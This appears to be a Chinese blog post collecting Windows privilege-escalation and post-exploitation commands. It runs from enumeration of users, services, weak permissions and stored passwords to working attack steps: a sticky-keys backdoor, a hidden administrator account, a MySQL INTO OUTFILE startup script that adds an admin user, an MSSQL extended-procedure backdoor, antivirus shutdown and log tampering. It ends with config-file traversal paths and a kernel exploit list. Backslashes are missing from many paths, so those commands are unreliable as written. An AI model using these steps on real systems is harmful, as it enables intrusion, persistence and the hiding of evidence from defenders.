Win提權思路，方法，工具（小總結）

怪狗提示，值得收藏與分享！

介紹

windows提權總是被歸結為適當的枚舉。但要完成適當的枚舉，你需要知道要檢查和查找的內容。這通常需要伴隨著經驗的豐富而對系統非常熟悉。起初特權升級看起來像是一項艱巨的任務，但過了一段時間，你就開始過濾哪些是正常的東西，而哪些不是正常的東西。最終變得更容易，因為你知道要尋找什麼了，而不是挖掘希望在乾草堆中找到那根針的所有東西。希望本指南能為你的入門提供良好的基礎知識。

所以本指南主要集中在枚舉方面。

註：我不是專家，仍然在學習當中。

指南概述

在每個部分中，我首先提供老的可靠的CMD命令，然後是一個Powershell實現的的等價命令。同時擁有這兩種工具是非常好的，Powershell比傳統的CMD更加靈活。然而，沒有一個Powershell命令能等價於所有東西（或者CMD在某些事情上仍然更簡單更好），所以一些部分將只包含常規的CMD命令。

命令了解操作系統類型和架構？它是否缺少任何補丁？

systeminfo

wmic qfe

環境變數有什麼有趣的地方嗎？域控制器在LOGONSERVER？

set

Get-ChildItem Env: | ft Key,Value

有沒有其他連接的驅動器？

net use

wmic logicaldisk get caption,description,providername

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.CoreFileSystem"}| ft Name,Root

用戶，你是誰？

whoami

echo %USERNAME%

$env:UserName

系統上有哪些用戶？任何舊的用戶配置文件沒有被清理掉？

net users

dir /b /ad "C:Users"

dir /b /ad "C:Documents and Settings" # Windows XP and below

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:Users -Force | select Name

是否有其他人登錄？

qwinsta

系統上有哪些用戶組？

net localgroup

Get-LocalGroup | ft Name

在管理員組中有哪些用戶？

net localgroup Administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

用戶自動登錄對應的註冊表中有些什麼內容？

reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinLogon | select "Default*"

Credential Manager中有什麼有趣的東西？

cmdkey /list

我們可以訪問SAM和SYSTEM文件嗎？

%SYSTEMROOT%
epairSAM

%SYSTEMROOT%System32configRegBackSAM

%SYSTEMROOT%System32configSAM

%SYSTEMROOT%
epairsystem

%SYSTEMROOT%System32configSYSTEM

%SYSTEMROOT%System32configRegBacksystem

程序，進程和服務,系統都安裝了些什麼軟體？

dir /a "C:Program Files"

dir /a "C:Program Files (x86)"

reg query HKEY_LOCAL_MACHINESOFTWARE

Get-ChildItem C:Program Files, C:Program Files (x86) | ft Parent,Name,LastWriteTime

Get-ChildItem -path Registry::HKEY_LOCAL_MACHINESOFTWARE | ft Name

有沒有許可權設置的比較脆弱的文件夾或文件的許可權？

在程序文件夾中（Program Folders）有哪些文件或文件夾賦予了所有人（Everyone）或用戶（User）的完全許可權？

icacls "C:Program Files*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:Program Files (x86)*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:Program Files*" 2>nul | findstr "(F)" | findstr "BUILTINUsers"

icacls "C:Program Files (x86)*" 2>nul | findstr "(F)" | findstr "BUILTINUsers"

修改程序文件夾（Program Folders）中的所有人（Everyone）或用戶（User）的許可權？

icacls "C:Program Files*" 2>nul | findstr "(M)" | findstr "Everyone"

icacls "C:Program Files (x86)*" 2>nul | findstr "(M)" | findstr "Everyone"

icacls "C:Program Files*" 2>nul | findstr "(M)" | findstr "BUILTINUsers"

icacls "C:Program Files (x86)*" 2>nul | findstr "(M)" | findstr "BUILTINUsers"

Get-ChildItem C:Program Files*,C:Program Files (x86)* | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match Everyone} } catch {}}

Get-ChildItem C:Program Files*,C:Program Files (x86)* | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match BUILTINUsers} } catch {}}

你也可以上傳Sysinternals中的accesschk來檢查可寫文件夾和文件。

accesschk.exe -qwsu "Everyone" *

accesschk.exe -qwsu "Authenticated Users" *

accesschk.exe -qwsu "Users" *

系統上正在運行的進程/服務有哪些？有沒有暴露的內部服務？如果是這樣，我們可以打開它嗎？請參閱附錄中的埠轉發。

tasklist /svc

tasklist /v

net start

sc query

Get-Process | ft ProcessName,Id

Get-Service

是否存在任何脆弱的服務許可權？我們可以重新配置什麼嗎？你可以再次上傳accesschk來檢查許可權。

accesschk.exe -uwcqv "Everyone" *

accesschk.exe -uwcqv "Authenticated Users" *

accesschk.exe -uwcqv "Users" *

有沒有引用的服務路徑？

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:Windows" 2>nul |findstr /i /v """

是否設置了計劃任務？任何自定義實現的計劃任務？

schtasks /query /fo LIST 2>nul | findstr TaskName

dir C:windows asks

Get-ScheduledTask | ft TaskName, State

系統啟動時都運行了些什麼？

wmic startup get caption,command

reg query HKLMSoftwareMicrosoftWindowsCurrentVersionRun

reg query HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnce

reg query HKCUSoftwareMicrosoftWindowsCurrentVersionRun

reg query HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce

dir "C:Documents and SettingsAll UsersStart MenuProgramsStartup"

dir "C:Documents and Settings\%username%Start MenuProgramsStartup"

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl

Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce

Get-ItemProperty -Path Registry::HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

Get-ItemProperty -Path Registry::HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce

Get-ChildItem "C:UsersAll UsersStart MenuProgramsStartup"

Get-ChildItem "C:Users$env:USERNAMEStart MenuProgramsStartup"

AlwaysInstallElevated是否啟用？我沒有跑過這個，但沒有傷害檢查。

reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated

網路連接到了哪一塊網卡？是否有多個網路？

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

我們有哪些網路路線？

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP緩存中有什麼？

arp -a

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

是否有連接到其他主機的網路連接？

netstat -ano

hosts文件中的有什麼東西？

C:WINDOWSSystem32driversetchosts

防火牆是否打開？如果是又是怎樣配置的？

netsh firewall show state

netsh firewall show config

netsh advfirewall firewall show rule name=all

netsh advfirewall export "firewall.txt"

任何其他有趣的介面配置？

netsh dump

有沒有SNMP配置？

reg query HKLMSYSTEMCurrentControlSetServicesSNMP /s

Get-ChildItem -path HKLM:SYSTEMCurrentControlSetServicesSNMP -Recurse

有趣的文件和敏感信息

這部分內容的命令輸出可能有點雜亂，所以你可能想把命令的輸出重定向到txt文件中進行審查和解析。

在註冊表中是否有任何密碼？

reg query HKCU /f password /t REG_SZ /s

reg query HKLM /f password /t REG_SZ /s

查看是否存在沒有清理掉的sysprep或unattended文件？

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Get-Childitem –Path C: -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

如果伺服器是IIS網路伺服器，那麼inetpub中有什麼？以及任何隱藏的目錄？web.config文件？

dir /a C:inetpub

dir /s web.config

C:WindowsSystem32inetsrvconfigapplicationHost.config

Get-Childitem –Path C:inetpub -Include web.config -File -Recurse -ErrorAction SilentlyContinue

在IIS日誌目錄中有些什麼文件？

C:inetpublogsLogFilesW3SVC1u_ex[YYMMDD].log

C:inetpublogsLogFilesW3SVC2u_ex[YYMMDD].log

C:inetpublogsLogFilesFTPSVC1u_ex[YYMMDD].log

C:inetpublogsLogFilesFTPSVC2u_ex[YYMMDD].log

是否安裝了XAMPP，Apache或PHP？任何有XAMPP，Apache或PHP配置文件？

dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Get-Childitem –Path C: -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue

系統中是否存在任何Apache網路日誌？

dir /s access.log error.log

Get-Childitem –Path C: -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

系統中是否任何有趣的文件？可能在用戶目錄（桌面，文檔等）？

dir /s *pass* == *vnc* == *.config* 2>nulGet-Childitem –Path C:Users -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue

系統中是否有包含密碼的文件？

findstr /si password *.xml *.ini *.txt *.config 2>nul

Get-ChildItem C:* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"

cmd 下操作VPN 相關知識，資料：

#允許administrator撥入該VPN：

netsh ras set user administrator permit

#禁止administrator撥入該VPN：

netsh ras set user administrator deny

#查看哪些用戶可以撥入VPN：

netsh ras show user

#查看VPN分配IP的方式：

netsh ras ip show config

#使用地址池的方式分配IP：

netsh ras ip set addrassign method = pool

#地址池的範圍是從192.168.3.1到192.168.3.254：

netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254

Cmd、Dos 命令行下添加 SQL 用戶的方法：

需要有管理員許可權，在命令下先建立一個「c: est.qry」文件，內容如下：

exec master.dbo.sp_addlogin test,123

EXEC sp_addsrvrolemember test, sysadmin

然後在DOS下執行：cmd.exe /c isql -E /U alma /P /i c: est.qry

另類的加用戶方法：

在刪掉了 net.exe 和不用 adsi 之外，新的加用戶的方法。代碼如下：

js:

var o=new ActiveXObject( "Shell.Users" );

z=o.create("test") ;

z.changePassword("123456","")

z.setting("AccountType")=3;

vbs:

view source

Set o=CreateObject( "Shell.Users" )

Set z=o.create("test")

z.changePassword "123456",""

z.setting("AccountType")=3

Cmd 訪問控制許可權控制：

命令如下：

cacls c: /e /t /g everyone:F #c盤everyone許可權

cacls "目錄" /d everyone #everyone不可讀，包括admin

備註：

反制方法，在文件夾安全設置里將 Everyone 設定為不可讀，如果沒有安全性選項：工具 – 文件夾選項 – 使用簡單的共享去掉即可。

3389 相關，以下配合PR更好：

a、防火牆TCP/IP篩選.(關閉：net stop policyagent & net stop sharedaccess)

b、內網環境(lcx.exe)

c、終端伺服器超出了最大允許連接(XP 運行：mstsc /admin;2003 運行：mstsc /console)

1.查詢終端埠：

REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber

2.開啟XP&2003終端服務：

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改終端埠為2008(十六進位為：0x7d8)：

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWds
dpwdTds cp /v PortNumber /t REG_DWORD /d 0x7d8 /f

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

4.取消xp&2003系統防火牆對終端服務的限制及IP連接的限制：

REG ADD HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"")");

insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");

select * from a into outfile "C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\a.vbs";

BS馬的PortMap功能，類似LCX做轉發。若果支持ASPX，用這個轉發會隱蔽點。(註：一直忽略了在偏僻角落的那個功能)

關閉常見殺軟(把殺軟所在的文件的所有許可權去掉)：

處理變態諾頓企業版：

net stop "Symantec AntiVirus" /y

net stop "Symantec AntiVirus Definition Watcher" /y

net stop "Symantec Event Manager" /y

net stop "System Event Notification" /y

net stop "Symantec Settings Manager" /y

麥咖啡：

net stop "McAfee McShield"

Symantec病毒日誌:

C:Documents and SettingsAll UsersApplication DataSymantecSymantec Endpoint ProtectionLogs

Symantec病毒備份:

C:Documents and SettingsAll UsersApplication DataSymantecSymantec Endpoint ProtectionQuarantine

Nod32病毒備份:

C:Docume~1AdministratorLocal SettingsApplication DataESETESET NOD32 AntivirusQuarantine

Nod32移除密碼保護:

刪除「HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoPackageID」即可

安裝5次shift後門，沾滯鍵後門，替換SHIFT後門：

5次SHIFT，沾滯鍵後門：

copy %systemroot%system32sethc.exe %systemroot%system32dllcachesethc1.exe

copy %systemroot%system32cmd.exe %systemroot%system32dllcachesethc.exe /y

copy %systemroot%system32cmd.exe %systemroot%system32sethc.exe /y

替換SHIFT後門：

attrib c:windowssystem32sethc.exe -h -r -s

attrib c:windowssystem32dllcachesethc.exe -h -r -s

del c:windowssystem32sethc.exe

copy c:windowsexplorer.exe c:windowssystem32sethc.exe

copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe

attrib c:windowssystem32sethc.exe +h +r +s

attrib c:windowssystem32dllcachesethc.exe +h +r +s

添加隱藏系統賬號：

1、執行命令：

「net user admin$ 123456 /add&net localgroup administrators admin$ /add」。

2、導出註冊表SAM下用戶的兩個鍵值。

3、在用戶管理界面里的 admin$ 刪除，然後把備份的註冊表導回去。

4、利用 Hacker Defender 把相關用戶註冊表隱藏。

安裝 MSSQL 擴展後門：

USE master;

EXEC sp_addextendedproc xp_helpsystem, xp_helpsystem.dll;

GRANT exec On xp_helpsystem TO public;

處理伺服器MSFTP日誌：

在「C:WINNTsystem32LogFilesMSFTPSVC1」下有 ex011120.log / ex011121.log / ex011124.log 三個文件，直接刪除 ex0111124.log 不成功，顯示「原文件…正在使用」。

當然可以直接刪除「ex011120.log / ex011121.log」。然後用記事本打開「ex0111124.log」，刪除裡面的一些內容後，保存，覆蓋退出，成功。

當停止「msftpsvc」服務後可直接刪除「ex011124.log」。

MSSQL查詢分析器連接記錄清除：

MSSQL 2000 位於註冊表如下：

HKEY_CURRENT_USERSoftwareMicrosoftMicrosoft SQL Server80ToolsClientPrefServers

找到接接過的信息刪除。

MSSQL 2005 是在：

C:Documents and Settings\Application DataMicrosoftMicrosoft SQL Server90ToolsShellmru.dat

各種網站的配置文件相對路徑大全：

/config.php

../../config.php

../config.php

../../../config.php

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/conn.php

./conn.php

../../conn.php

../conn.php

../../../conn.php

/conn.asp

./conn.asp

../../conn.asp

../conn.asp

../../../conn.asp

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/config/config.php

../../config/config.php

../config/config.php

../../../config/config.php

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/config/conn.php

./config/conn.php

../../config/conn.php

../config/conn.php

../../../config/conn.php

/config/conn.asp

./config/conn.asp

../../config/conn.asp

../config/conn.asp

../../../config/conn.asp

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/data/config.php

../../data/config.php

../data/config.php

../../../data/config.php

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/data/conn.php

./data/conn.php

../../data/conn.php

../data/conn.php

../../../data/conn.php

/data/conn.asp

./data/conn.asp

../../data/conn.asp

../data/conn.asp

../../../data/conn.asp

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/include/config.php

../../include/config.php

../include/config.php

../../../include/config.php

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/include/conn.php

./include/conn.php

../../include/conn.php

../include/conn.php

../../../include/conn.php

/include/conn.asp

./include/conn.asp

../../include/conn.asp

../include/conn.asp

../../../include/conn.asp

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/inc/config.php

../../inc/config.php

../inc/config.php

../../../inc/config.php

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/inc/conn.php

./inc/conn.php

../../inc/conn.php

../inc/conn.php

../../../inc/conn.php

/inc/conn.asp

./inc/conn.asp

../../inc/conn.asp

../inc/conn.asp

../../../inc/conn.asp

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/index.php

./index.php

../../index.php

../index.php

../../../index.php

/index.asp

./index.asp

../../index.asp

../index.asp

../../../index.asp

大牛總結的Window提權Exp合集

漏洞列表

#Security Bulletin #KB #Description #Operating System

CVE-2017-0213 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)

MS17-010 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)

MS16-135 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)

MS16-098 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)

MS16-075 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)

MS16-032 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)

MS16-016 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)

MS15-097 　[KB3089656]　　[remote code execution]　　(win8.1/2012)

MS15-076 　[KB3067505]　　[RPC]　　(2003/2008/7/8/2012)

MS15-077 　[KB3077657]　　[ATM]　　(XP/Vista/Win7/Win8/2000/2003/2008/2012)

MS15-061 　[KB3057839]　　[Kernel Driver]　　(2003/2008/7/8/2012)

MS15-051 　[KB3057191]　　[Windows Kernel Mode Drivers]　　(2003/2008/7/8/2012)

MS15-010 　[KB3036220]　　[Kernel Driver]　　(2003/2008/7/8)

MS15-015 　[KB3031432]　　[Kernel Driver]　　(Win7/8/8.1/2012/RT/2012 R2/2008 R2)

MS15-001 　[KB3023266]　　[Kernel Driver]　　(2008/2012/7/8)

MS14-070 　[KB2989935]　　[Kernel Driver]　　(2003)

MS14-068 　[KB3011780]　　[Domain Privilege Escalation]　　(2003/2008/2012/7/8)

MS14-058 　[KB3000061]　　[Win32k.sys]　　(2003/2008/2012/7/8)

MS14-040 　[KB2975684]　　[AFD Driver]　　(2003/2008/2012/7/8)

MS14-002 　[KB2914368]　　[NDProxy]　　(2003/XP)

MS13-053 　[KB2850851]　　[win32k.sys]　　(XP/Vista/2003/2008/win 7)

MS13-046 　[KB2840221]　　[dxgkrnl.sys]　　(Vista/2003/2008/2012/7)

MS13-005 　[KB2778930]　　[Kernel Mode Driver]　　(2003/2008/2012/win7/8)

MS12-042 　[KB2972621]　　[Service Bus]　　(2008/2012/win7)

MS12-020 　[KB2671387]　　[RDP]　　(2003/2008/7/XP)

MS11-080 　[KB2592799]　　[AFD.sys]　　(2003/XP)

MS11-062 　[KB2566454]　　[NDISTAPI]　　(2003/XP)

MS11-046 　[KB2503665]　　[AFD.sys]　　(2003/2008/7/XP)

MS11-011 　[KB2393802]　　[kernel Driver]　　(2003/2008/7/XP/Vista)

MS10-092 　[KB2305420]　　[Task Scheduler]　　(2008/7)

MS10-065 　[KB2267960]　　[FastCGI]　　(IIS 5.1, 6.0, 7.0, and 7.5)

MS10-059 　[KB982799]　　 [ACL-Churraskito]　　(2008/7/Vista)

MS10-048 　[KB2160329]　　[win32k.sys]　　(XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)

MS10-015 　[KB977165]　　 [KiTrap0D]　　(2003/2008/7/XP)

MS09-050 　[KB975517]　　 [Remote Code Execution]　　(2008/Vista)

MS09-020 　[KB970483]　　 [IIS 6.0]　　(IIS 5.1 and 6.0)

MS09-012 　[KB959454]　　 [Chimichurri]　　(Vista/win7/2008/Vista)

MS08-068 　[KB957097]　　 [Remote Code Execution]　　(2000/XP)

MS08-067 　[KB958644]　　 [Remote Code Execution]　　(Windows 2000/XP/Server 2003/Vista/Server 2008)

MS08-025 　[KB941693]　　 [Win32.sys]　　(XP/2003/2008/Vista)

MS06-040 　[KB921883]　　 [Remote Code Execution]　　(2003/xp/2000)

MS05-039 　[KB899588]　　 [PnP Service]　　(Win 9X/ME/NT/2000/XP/2003)

MS03-026 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)

項目下載地址;https://github.com/SecWiki/windows-kernel-exploits

文章內容50%來源於

https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/